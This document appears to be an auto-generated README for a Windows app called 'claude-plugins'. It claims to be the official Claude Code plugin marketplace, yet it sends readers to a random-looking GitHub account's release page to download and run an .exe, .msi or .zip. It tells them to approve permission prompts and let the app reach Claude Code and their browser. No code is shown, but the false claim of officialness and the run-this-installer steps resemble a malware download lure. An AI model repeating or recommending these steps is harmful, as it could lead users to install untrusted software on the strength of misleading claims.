claude-plugins is the official plugin marketplace for Claude Code from Brainrot Creations. It helps you find and use plugins for tasks like social tools, Hive, browser automation, and other AI agent flows.
This README shows you how to get the app on Windows, open it, and start using it.
Visit this page to download: github.com/ninnettesudanese653/claude-plugins/releases
- Open the release page in your browser.
- Find the latest release at the top.
- Download the Windows file from the Assets section.
- Save the file to your Downloads folder or Desktop.
If the release page offers more than one file, choose the one for Windows. It may be an .exe, .msi, or .zip file.
- Double-click the file.
- If Windows asks for permission, select Yes.
- Follow the setup steps on the screen.
- Finish the install and keep the default settings if you are unsure.
- Double-click the file.
- Select Next when the setup window opens.
- Accept the terms if asked.
- Select Install and wait for it to finish.
- Right-click the file.
- Select Extract All.
- Choose a folder you can find later, such as Desktop.
- Open the extracted folder.
- Double-click the app file inside.
- Open the app from the Start menu, Desktop, or the folder where you installed it.
- Wait for the main window to load.
- Sign in if the app asks you to.
- Allow any prompt that lets the app connect to Claude Code or your browser.
If the app opens in a browser window, leave it open while you use the marketplace.
claude-plugins gives you a simple place to browse and manage plugins. Common uses include:
- Social media helpers
- Hive tools
- Browser automation
- Claude Code plugin setup
- Model Context Protocol, or MCP, based tools
- AI agent add-ons for common workflows
You can use the marketplace to explore plugins, learn what each one does, and choose what fits your work.
The app connects plugin listings with Claude Code workflows. In plain terms, it helps you:
- Browse available plugins.
- Read what each plugin does.
- Pick a plugin you want to use.
- Follow the setup steps shown in the app.
- Return to the marketplace when you want to add more tools.
Some plugins may ask for access to your browser or local Claude Code setup. That is normal for tools that automate actions or connect to external services.
To run claude-plugins on Windows, use a PC that meets these basic needs:
- Windows 10 or Windows 11
- An internet connection for downloads and updates
- Enough free disk space for the app and plugin files
- A modern browser like Chrome, Edge, or Firefox
- Permission to install apps on your device
For the best experience, keep Windows updated and close extra apps if your computer runs slow.
- Keep the release file in a folder you can find again.
- Use the latest release when possible.
- If Windows blocks the file, check that you downloaded it from the official release page.
- If the app does not open, try running it again as the user who installed it.
- If you use browser automation plugins, keep your browser updated too.
- Open claude-plugins.
- Use the marketplace view to look through plugin cards or lists.
- Read the short description for each plugin.
- Pick the plugin that matches your task.
- Follow the install or connect steps shown in the app.
Look for clear names, short descriptions, and tags such as browser automation, Hive, MCP, or Claude Code.
These plugins help with tasks tied to social platforms and content workflows.
These plugins fit workflows built around Hive-related tasks and services.
These plugins help Claude Code control browser actions, fill forms, or move through web pages.
These plugins use the Model Context Protocol, which lets apps and tools share context in a standard way.
These plugins help with multi-step tasks where an agent needs to gather data, act, or pass work between tools.
- Make sure the download finished fully.
- Try opening the file again.
- Move the file out of a compressed folder if you used a
.zip. - Check that Windows did not block the file.
- Confirm you used the release page linked above.
- Download the newest file from the official release list.
- Try the install again after saving the file to a local folder.
- Check your internet connection.
- Close the app and open it again.
- Refresh the page if the app opens in the browser.
- Check whether the plugin needs Claude Code access.
- Confirm that your browser is open if the plugin uses browser automation.
- Try removing and adding the plugin again from the marketplace
The release page may offer files such as:
claude-plugins-setup.execlaude-plugins-windows.msiclaude-plugins.zip
Pick the file that fits your Windows setup. If you are unsure, use the .exe file first.
Some plugins need access to local tools, your browser, or Claude Code settings. Only add plugins you trust and only grant the permissions they need.
Review each plugin page before you install it. If a plugin asks for more access than you want to give, skip it and choose another one.
- Return to the releases page.
- Download the newest Windows file.
- Install or replace the older version.
- Open the app again.
Using the latest release helps keep the marketplace and plugin list current.
- Download claude-plugins from the release page.
- Install or open it on Windows.
- Browse the marketplace.
- Choose a plugin for your task.
- Connect it to Claude Code or your browser when needed.
- Return later to add more plugins
This project is tagged with topics such as:
- ai-agents
- anthropic
- brainrot-creations
- browser-automation
- claude-code
- claude-code-plugin
- hive
- mcp
- model-context-protocol
- plugin-marketplace